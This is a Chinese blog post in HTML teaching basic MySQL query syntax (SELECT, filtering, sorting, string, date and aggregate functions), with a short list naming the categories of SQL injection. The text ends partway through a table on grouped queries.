<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.0"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>MYSQL的学习 - 麦芽屋</title><meta description="[ MYSQL的学习 ] 简单介绍了一下使用及SQL注入的奇淫技巧，详细解释请自查手册文档等等."><meta property="og:type" content="blog"><meta property="og:title" content="MYSQL的学习"><meta property="og:url" content="white3.github.io"><meta property="og:site_name" content="麦芽屋"><meta property="og:description" content="[ MYSQL的学习 ] 简单介绍了一下使用及SQL注入的奇淫技巧，详细解释请自查手册文档等等."><meta property="og:locale" content="zh_CN"><meta property="article:published_time" content="2016-04-15T00:00:00.000Z"><meta property="article:modified_time" content="2019-12-28T12:20:18.304Z"><meta property="article:author" content="Menzel3"><meta property="article:tag" content="MYSQL"><meta property="article:tag" content="笔记"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"white3.github.io/2016/04/15/2016/MYSQL%E7%9A%84%E5%AD%A6%E4%B9%A0/"},"headline":"麦芽屋","image":["/img/og_image.png"],"datePublished":"2016-04-15T00:00:00.000Z","dateModified":"2019-12-28T12:20:18.304Z","author":{"@type":"Person","name":"Menzel3"},"description":"[ MYSQL的学习 ] 简单介绍了一下使用及SQL注入的奇淫技巧，详细解释请自查手册文档等等."}</script><link rel="icon" href="/img/Maltose.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script>var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?18939939b5c3dc3864e568c356b3006c";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();</script><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/Maltose.png" alt="麦芽屋" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><time class="level-item" dateTime="2016-04-15T00:00:00.000Z" title="2016-04-15T00:00:00.000Z">2016-04-15</time><span class="level-item">23 分钟 读完 (大约 3477 个字)</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">MYSQL的学习</h1><div class="content"><p>[ MYSQL的学习 ] 简单介绍了一下使用及SQL注入的奇淫技巧，详细解释请自查手册文档等等.</p>
<a id="more"></a>
<h2 id="SQL注入的分类："><a href="#SQL注入的分类：" class="headerlink" title="SQL注入的分类："></a>SQL注入的分类：</h2><p><strong>基于从服务器接收到的响应</strong></p>
<ul>
<li style="list-style: none"><input type="checkbox"></input> 基于错误的SQL注入</li>
<li style="list-style: none"><input type="checkbox"></input> 联合查询的类型</li>
<li style="list-style: none"><input type="checkbox"></input> 堆查询注射</li>
<li style="list-style: none"><input type="checkbox"></input> SQL盲注 - 布尔盲注  - 时间盲注  - 报错盲注</li>
</ul>
<p><strong>基于如何处理输入的SQL查询</strong></p>
<ul>
<li style="list-style: none"><input type="checkbox"></input> 基于字符串</li>
<li style="list-style: none"><input type="checkbox"></input> 数字或整数为基础</li>
</ul>
<p><strong>基于程度和顺序的注入</strong></p>
<ul>
<li style="list-style: none"><input type="checkbox"></input> 一阶注射</li>
<li style="list-style: none"><input type="checkbox"></input> 二阶注射</li>
<li style="list-style: none"><input type="checkbox"></input> 通过用户输入的表单域的注射</li>
<li style="list-style: none"><input type="checkbox"></input> 通过cookie注射</li>
<li style="list-style: none"><input type="checkbox"></input> 通过服务器变量注射</li>
</ul>
<h2 id="DQL语言"><a href="#DQL语言" class="headerlink" title="DQL语言"></a>DQL语言</h2><p><strong>常用专业用语</strong></p>
<blockquote>
<p>DB：数据库 (Database)</p>
<p>DBMS：数据库管理系统 (Database Management System)</p>
<p>SQL：结构化查询语言，用于与数据库交互的语言</p>
<p>字段：数据表的列</p>
</blockquote>
<p><strong>常用SQL语句</strong></p>
<blockquote>
<p>查询所有数据库：show databases;</p>
<p>查询当前数据库中所有数据表：show tables;</p>
<p>查询某个表结构：desc [数据表名];</p>
<p>@@datadir：数据库路径</p>
<p>@@version_compile_os：操作系统版本</p>
</blockquote>
<p>注释符号</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">单行注释：# 或 <span class="comment">-- 或 /**/</span></span><br><span class="line">多行注释：<span class="comment">--</span></span><br></pre></td></tr></table></figure>
<hr>
<h3 id="SELECT"><a href="#SELECT" class="headerlink" title="SELECT"></a>SELECT</h3><h4 id="基础查询："><a href="#基础查询：" class="headerlink" title="基础查询："></a>基础查询：</h4><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">去重查询：  <span class="keyword">select</span> <span class="keyword">distinct</span> ... ;</span><br><span class="line">单字段查询：<span class="keyword">select</span> [字段名称] <span class="keyword">from</span> [表名称];</span><br><span class="line">多字段查询：<span class="keyword">select</span> [字段名称], [字段名称] <span class="keyword">from</span> [表名称];</span><br><span class="line">查询所有：  <span class="keyword">select</span> * <span class="keyword">from</span> [表名称];</span><br><span class="line">查询函数：  <span class="keyword">select</span> [函数名称];</span><br><span class="line">查询表达式：<span class="keyword">select</span> [运算公式];</span><br><span class="line">查询常量：  <span class="keyword">select</span> [常量];</span><br></pre></td></tr></table></figure>
<p>取别名：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1. [原名称] as [新名称]</span><br><span class="line">2. [原名称]    [新名称]</span><br><span class="line">样例:</span><br><span class="line">select first_name hahaha, last_name as hehehehe <span class="keyword">from</span> users;</span><br><span class="line">当新名称中含有特殊字符，请使用引号包裹起来如下:</span><br><span class="line">select uid as <span class="string">"e eee"</span>, sex <span class="string">"a aaa"</span> <span class="keyword">from</span> users;</span><br></pre></td></tr></table></figure>
<p>操作符优先级(优先级高优先运算)</p>
<figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">:</span>=</span><br><span class="line"></span><br><span class="line">||, <span class="built_in">OR</span>, <span class="built_in">XOR</span></span><br><span class="line"></span><br><span class="line">&amp;&amp;, <span class="built_in">AND</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">NOT</span></span><br><span class="line"></span><br><span class="line">BETWEEN, CASE, WHEN, THEN, ELSE</span><br><span class="line"></span><br><span class="line">=, &lt;=&gt;, &gt;=, &gt;, &lt;=, &lt;, &lt;&gt;, !=, IS, LIKE, REGEXP, IN</span><br><span class="line"></span><br><span class="line">|</span><br><span class="line"></span><br><span class="line">&amp;</span><br><span class="line"></span><br><span class="line">&lt;&lt;, &gt;&gt;</span><br><span class="line"></span><br><span class="line">-, +</span><br><span class="line"></span><br><span class="line">*, /, DIV, %, <span class="built_in">MOD</span></span><br><span class="line"></span><br><span class="line">^</span><br><span class="line"></span><br><span class="line">- (一元减号), ~ (一元比特反转)</span><br><span class="line"></span><br><span class="line">!</span><br><span class="line"></span><br><span class="line">BINARY, COLLATE</span><br><span class="line"></span><br><span class="line">注意：若开启HIGH_NOT_PRECEDENCE SQL模式被激活，<span class="built_in">NOT</span>的优先级与 ! 同级</span><br></pre></td></tr></table></figure>
<p>‘+’ 的作用</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">仅为运算符</span><br><span class="line"><span class="number">1.</span> 数值型 + 数值型 ：作加法运算</span><br><span class="line"><span class="number">2.</span> 数值型 + 字符型 ：系统试图将字符型转换为数值型，若转换成功则加法运算，否则字符型值转换为<span class="number">0</span>与数值型相加。</span><br><span class="line"><span class="number">3.</span> 数值型 + <span class="literal">null</span> ：<span class="literal">null</span>，注意只要有<span class="literal">null</span>，便全为<span class="literal">null</span></span><br></pre></td></tr></table></figure>
<p>拼接函数 CONCAT()</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">返回结果为连接参数产生的字符串</span><br><span class="line"><span class="number">1.</span> 如有任何一个参数为<span class="keyword">NULL</span> ，则返回值为 <span class="keyword">NULL</span>。</span><br><span class="line"><span class="number">2.</span> 如果所有参数均为非二进制字符串，则结果为非二进制字符串。 </span><br><span class="line"><span class="number">3.</span> 如果自变量中含有任一二进制字符串，则结果为一个二进制字符串。</span><br><span class="line">例如：</span><br><span class="line"><span class="keyword">select</span> concat(<span class="number">-1</span>,<span class="number">0</span>,<span class="number">0.1</span>,<span class="number">1</span>);</span><br><span class="line"><span class="keyword">select</span> concat(<span class="number">-1</span>,"null");</span><br><span class="line"><span class="keyword">select</span> concat("-1","null");</span><br><span class="line"><span class="keyword">select</span> concat("null",<span class="keyword">null</span>);</span><br><span class="line">附加一个函数concat_ws()，把上面的<span class="keyword">SQL</span>语句中的concat换成concat_ws试试</span><br></pre></td></tr></table></figure>
<h4 id="条件查询："><a href="#条件查询：" class="headerlink" title="条件查询："></a>条件查询：</h4><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> [查询列表] <span class="keyword">from</span> [表名] <span class="keyword">where</span> [筛选条件];</span><br></pre></td></tr></table></figure>
<p>条件表达式筛选：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; &lt; = != &lt;&gt; &gt;= &lt;=</span><br><span class="line">例：select id haha <span class="keyword">from</span><span class="built_in"> users </span>where id&gt;1 &amp;&amp; id!=2 &amp;&amp; id&lt;&gt;3 &amp;&amp; id&gt;=4 &amp;&amp; id&lt;=5 &amp;&amp; id&lt;6 || <span class="attribute">id</span>=7;</span><br></pre></td></tr></table></figure>
<p><strong>注意：</strong><br><strong>&lt;=&gt; 为安全等于，这个操作符和=操作符执行相同的比较操作，不过在两个操作码均为NULL时，其所得值为1而不为NULL，而当一个操作码为NULL时，其所得值为0而不为NULL。</strong></p>
<p>逻辑表达式筛选：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&amp;&amp; ! || </span><br><span class="line"><span class="keyword">and</span> <span class="keyword">or</span> <span class="keyword">not</span></span><br><span class="line">例：select id haha <span class="keyword">from</span><span class="built_in"> users </span>where <span class="keyword">not</span> (<span class="attribute">id</span>=-1 <span class="keyword">and</span> <span class="attribute">id</span>=1 <span class="keyword">or</span> !(<span class="attribute">id</span>=2 || <span class="attribute">id</span>=3) &amp;&amp; id&lt;&gt;4);</span><br></pre></td></tr></table></figure>
<p>模糊查询</p>
<ul>
<li>like </li>
</ul>
<p>与通配符搭配<br>% 百分号表示多字节通配<br>_ 下划线表示单字节通配<br>\ 斜杠表示转义符<br>注意：ESCAPE关键词可以指定某些符号为转义符</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">例：</span><br><span class="line">查询名字第二个字符为<span class="string">'_'</span>，第三个字符为<span class="string">'%'</span>的字符串</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where username like <span class="string">'_\_\%%'</span>;</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where username like <span class="string">'_a_a%%'</span> ESCAPE <span class="string">'a'</span>;</span><br></pre></td></tr></table></figure>
<ul>
<li>between and </li>
<li>In</li>
<li>is null</li>
</ul>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">between [条件] <span class="keyword">and</span> [条件]</span><br><span class="line"><span class="keyword">In</span> [条件]</span><br><span class="line">is <span class="literal">null</span> [条件]</span><br><span class="line">例：</span><br><span class="line">查询 id 1-3的用户</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where id between 1 <span class="keyword">and</span> <span class="string">'3'</span>;</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where id <span class="keyword">in</span>(<span class="string">"1"</span>, 2, <span class="string">'3'</span>);</span><br><span class="line">查询 id 为空的用户</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where email is <span class="literal">null</span>;</span><br></pre></td></tr></table></figure>
<h4 id="排序查询"><a href="#排序查询" class="headerlink" title="排序查询"></a>排序查询</h4><p>语法</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">select [查询列表] </span><br><span class="line"><span class="keyword">from</span> [数据表] </span><br><span class="line">where [筛选条件] </span><br><span class="line">order by [排序列表] [asc|desc]</span><br><span class="line">注意：排序列表可以为表头，表示通过该字段排序，当为数字n时，表示通过当前查询的第n个字段来排序。比如下表结构中：select username <span class="keyword">from</span><span class="built_in"> users </span>order by 1; 表示通过username排序查询, 如果把 1 改为 2 则报错。而 select * <span class="keyword">from</span><span class="built_in"> users </span>order by 1; 表示通过 id 排序查询, 如果把 1 增加到 5 则报错。即如果数字超出查询字段的个数范围则报错。</span><br></pre></td></tr></table></figure>
<p>解释：asc为升序，desc为降序，默认为升序.<br>例子：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">desc<span class="built_in"> users; </span># 表结构如下</span><br><span class="line">+----------+-------------+------+-----+---------+----------------+</span><br><span class="line">| Field    |<span class="built_in"> Type </span>       | <span class="literal">Null</span> | Key |<span class="built_in"> Default </span>| Extra          |</span><br><span class="line">+----------+-------------+------+-----+---------+----------------+</span><br><span class="line">| id       | int(11)     | <span class="literal">NO</span>   | PRI | <span class="literal">NULL</span>    | auto_increment |</span><br><span class="line">| username | varchar(20) | <span class="literal">NO</span>   |     | <span class="literal">NULL</span>    |                |</span><br><span class="line">| email    | varchar(50) | <span class="literal">NO</span>   |     | <span class="literal">NULL</span>    |                |</span><br><span class="line">| password | varchar(32) | <span class="literal">NO</span>   |     | <span class="literal">NULL</span>    |                |</span><br><span class="line">+----------+-------------+------+-----+---------+----------------+</span><br></pre></td></tr></table></figure>
<p>1.普通排序</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">select username <span class="keyword">from</span><span class="built_in"> users </span>order by username asc;</span><br><span class="line">select username <span class="keyword">from</span><span class="built_in"> users </span>order by 1 asc;</span><br><span class="line">select username <span class="keyword">from</span><span class="built_in"> users </span>order by username;</span><br><span class="line">select username <span class="keyword">from</span><span class="built_in"> users </span>order by 1;</span><br><span class="line">select username <span class="keyword">from</span><span class="built_in"> users </span>order by username desc;</span><br><span class="line">select username <span class="keyword">from</span><span class="built_in"> users </span>order by 1 desc;</span><br></pre></td></tr></table></figure>
<p>2.表达式排序</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>order by (-id*id+4*id-6) asc;</span><br></pre></td></tr></table></figure>
<p>3.别名排序</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select username haha <span class="keyword">from</span><span class="built_in"> users </span>order by haha desc;</span><br></pre></td></tr></table></figure>
<p>4.函数排序</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>order by length(username) desc;</span><br></pre></td></tr></table></figure>
<p>5.多项排序</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>order by length(username) desc,username desc;</span><br></pre></td></tr></table></figure>
<h4 id="常见函数"><a href="#常见函数" class="headerlink" title="常见函数"></a><strong>常见函数</strong></h4><h5 id="单行函数"><a href="#单行函数" class="headerlink" title="单行函数"></a>单行函数</h5><p><strong>1.字符函数</strong></p>
<table>
<thead>
<tr>
<th>函数名称</th>
<th>函数作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>length()</td>
<td>返回字符串的长度</td>
</tr>
<tr>
<td>concat()</td>
<td>连接字符串</td>
</tr>
<tr>
<td>upper()</td>
<td>字符串变大写</td>
</tr>
<tr>
<td>lower()</td>
<td>字符串变小写</td>
</tr>
<tr>
<td>substr()</td>
<td>截取子串</td>
</tr>
<tr>
<td>substring()</td>
<td>截取子串</td>
</tr>
<tr>
<td>instr()</td>
<td>返回字串第一次出现的索引，如果找不到返回0</td>
</tr>
<tr>
<td>trim()</td>
<td>去前后空格</td>
</tr>
<tr>
<td>lpad()</td>
<td>左填充</td>
</tr>
<tr>
<td>rpad()</td>
<td>右填充</td>
</tr>
<tr>
<td>replace()</td>
<td>字符串替换</td>
</tr>
</tbody>
</table>
<p><strong>2.数学函数</strong></p>
<table>
<thead>
<tr>
<th>函数名称</th>
<th>函数作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>round()</td>
<td>四舍五入</td>
</tr>
<tr>
<td>ceil()</td>
<td>向上取整</td>
</tr>
<tr>
<td>floor()</td>
<td>向下取整</td>
</tr>
<tr>
<td>truncate()</td>
<td>截断</td>
</tr>
<tr>
<td>mod()</td>
<td>取余</td>
</tr>
<tr>
<td>rand()</td>
<td>返回0-1之间的小数</td>
</tr>
</tbody>
</table>
<p><strong>3.日期函数</strong></p>
<table>
<thead>
<tr>
<th>函数名称</th>
<th>函数作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>now()</td>
<td>返回系统当前日期 + 时间</td>
</tr>
<tr>
<td>curdate()</td>
<td>返回系统当前日期</td>
</tr>
<tr>
<td>curtime()</td>
<td>返回系统当前日期</td>
</tr>
<tr>
<td>month()</td>
<td>通过日期获取月份，同样的还有年（year），周（week），日（day），小时（hour），分钟（minute），秒（second）</td>
</tr>
<tr>
<td>monthname()</td>
<td>通过日期获取英文月份</td>
</tr>
<tr>
<td>date_format()</td>
<td>将日期转换为字符</td>
</tr>
<tr>
<td>str_to_date()</td>
<td>将日期格式的字符转换成为指定格式的日期，若格式不对则返回 null ，如str_to_date(‘4-20-2018’, ‘%m-%d-%Y’)</td>
</tr>
<tr>
<td>datediff()</td>
<td>返回两个日期相差的天数</td>
</tr>
</tbody>
</table>
<p>MYSQL中时间的格式符表</p>
<table>
<thead>
<tr>
<th>序号</th>
<th>格式符</th>
<th>功能</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>%Y</td>
<td>四位的年份</td>
</tr>
<tr>
<td>2</td>
<td>%y</td>
<td>两位的年份</td>
</tr>
<tr>
<td>3</td>
<td>%m</td>
<td>月份(01,02…11,12)</td>
</tr>
<tr>
<td>4</td>
<td>%c</td>
<td>月份(1,2…11,12)</td>
</tr>
<tr>
<td>5</td>
<td>%d</td>
<td>日(01,02…)</td>
</tr>
<tr>
<td>6</td>
<td>%H</td>
<td>小时(24小时制)</td>
</tr>
<tr>
<td>7</td>
<td>%h</td>
<td>小时(12小时制)</td>
</tr>
<tr>
<td>8</td>
<td>%i</td>
<td>分钟(00,01,…59)</td>
</tr>
<tr>
<td>9</td>
<td>%s</td>
<td>秒(00,01,…59)</td>
</tr>
</tbody>
</table>
<p><strong>4.其他函数</strong></p>
<table>
<thead>
<tr>
<th>函数名称</th>
<th>函数作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>user()</td>
<td>返回当前话路被验证的用户名和主机名组合。</td>
</tr>
<tr>
<td>database()</td>
<td>返回使用 utf8 字符集的默认(当前)数据库名。在存储程序里，默认数据库是同该程序向关联的数据库，但并不一定与调用语境的默认数据库相同。</td>
</tr>
<tr>
<td>version()</td>
<td>返回指示 MySQL 服务器版本的字符串。这个字符串使用 utf8 字符集。</td>
</tr>
<tr>
<td>password(‘str’)</td>
<td>加密并返回该字符</td>
</tr>
<tr>
<td>md5()</td>
<td>md5加密并返回</td>
</tr>
</tbody>
</table>
<p><strong>5.流程控制函数</strong></p>
<p>1&gt; if 函数：if else 的效果</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (条件表达式, 表达式<span class="number">1</span>， 表达式<span class="number">2</span>)</span><br><span class="line">如果条件表达式满足条件，则表达式<span class="number">1</span>的值，否则表达式<span class="number">2</span>的值</span><br></pre></td></tr></table></figure>
<p>例：select username, if(id&gt;1, ‘会员’, ‘非会员’) from users; # 若id &gt; 1为会员，反之没有，输出所有用户的会员情况</p>
<p>2&gt; case 函数的使用一：switch case 的效果</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span></span><br><span class="line"><span class="keyword">case</span> 要判断的字段或表达式</span><br><span class="line">when 常量<span class="number">1</span> then 要显示的值<span class="number">1</span>或语句<span class="number">1</span></span><br><span class="line">when 常量<span class="number">2</span> then 要显示的值<span class="number">2</span>或语句<span class="number">2</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">else</span> 要显示的值n或语句n</span><br><span class="line">end</span><br><span class="line"><span class="number">2.</span></span><br><span class="line"><span class="keyword">case</span></span><br><span class="line">when 条件<span class="number">1</span> then 要显示的值<span class="number">1</span>或语句<span class="number">1</span></span><br><span class="line">when 条件<span class="number">2</span> then 要显示的值<span class="number">2</span>或语句<span class="number">2</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">else</span> 要显示的值n或语句n</span><br><span class="line">end</span><br></pre></td></tr></table></figure>
<p>例如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#exp1:</span></span><br><span class="line"><span class="keyword">select</span> username, <span class="keyword">id</span>, </span><br><span class="line"><span class="keyword">case</span> <span class="keyword">id</span> </span><br><span class="line">  <span class="keyword">when</span> <span class="number">0</span> <span class="keyword">then</span> <span class="string">'hahahaha'</span> </span><br><span class="line">  <span class="keyword">when</span> <span class="number">1</span> <span class="keyword">then</span> <span class="string">'hehehehe'</span> </span><br><span class="line">  <span class="keyword">else</span> <span class="string">'eeeeeeee'</span> </span><br><span class="line"><span class="keyword">end</span> <span class="keyword">as</span> <span class="string">'o.o.o.o'</span> </span><br><span class="line"><span class="keyword">from</span> <span class="keyword">users</span>; </span><br><span class="line"><span class="comment">#exp2:</span></span><br><span class="line"><span class="keyword">select</span> username, <span class="keyword">id</span>, </span><br><span class="line"><span class="keyword">case</span> </span><br><span class="line">  <span class="keyword">when</span> <span class="keyword">id</span>&lt;<span class="number">1</span> <span class="keyword">then</span> <span class="string">'hahahaha'</span> </span><br><span class="line">  <span class="keyword">when</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">then</span> <span class="string">'hehehehe'</span> </span><br><span class="line">  <span class="keyword">else</span> <span class="string">'eeeeeeee'</span> </span><br><span class="line"><span class="keyword">end</span> <span class="keyword">as</span> <span class="string">'o.o.o.o'</span> </span><br><span class="line"><span class="keyword">from</span> <span class="keyword">users</span>;</span><br></pre></td></tr></table></figure>
<h5 id="分组函数"><a href="#分组函数" class="headerlink" title="分组函数"></a>分组函数</h5><p>用作统计使用，又称为聚合函数或统计函数或组函数。简单说就算，常用于分组查询的函数，且他们能处理NULL。</p>
<p>分类：</p>
<p>sum 求和、avg 平均值、max 最大值、min 最小值、count 计算个数</p>
<p>注意：一般sum 和 avg用于处理数值型，而max, min, count可以处理任何数据类型，count(字段)用于统计字段非空值的个数，count(*)常用于统计行数</p>
<p>简例：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">sum</span>(<span class="keyword">id</span>), <span class="keyword">avg</span>(<span class="keyword">id</span>), <span class="keyword">max</span>(<span class="keyword">id</span>), <span class="keyword">count</span>(*) <span class="keyword">from</span> <span class="keyword">users</span>;</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">sum</span>(birthday), <span class="keyword">avg</span>(birthday), <span class="keyword">max</span>(birthday), <span class="keyword">count</span>(*) <span class="keyword">from</span> <span class="keyword">users</span>;</span><br></pre></td></tr></table></figure>
<h4 id="分组查询"><a href="#分组查询" class="headerlink" title="分组查询"></a>分组查询</h4><p>语法</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">5 select 分组函数, 分组后的字段</span><br><span class="line">1 <span class="keyword">from</span> 表名称 </span><br><span class="line">2 [where 筛选条件]</span><br><span class="line">3<span class="built_in"> group </span>by 分组的列表</span><br><span class="line">4 [having 分组后的筛选]</span><br><span class="line">6 [order by 子句]</span><br><span class="line">注意：查询列表必须特殊，要求是分组函数和group by后出现的字段，123456为筛选顺序</span><br></pre></td></tr></table></figure>
<p>注意：查询列表必须特殊，要求是分组函数和group by后出现的字段</p>
<ol>
<li>分组查询中的筛选条件分为两类</li>
</ol>
<table>
<thead>
<tr>
<th></th>
<th style="text-align:center">数据源</th>
<th style="text-align:center">位置</th>
<th style="text-align:center">关键字</th>
</tr>
</thead>
<tbody>
<tr>
<td>分组前筛选</td>
<td style="text-align:center">原始表</td>
<td style="text-align:center">group by 子句的前面</td>
<td style="text-align:center">where</td>
</tr>
<tr>
<td>分组后筛选</td>
<td style="text-align:center">分组后的结果集</td>
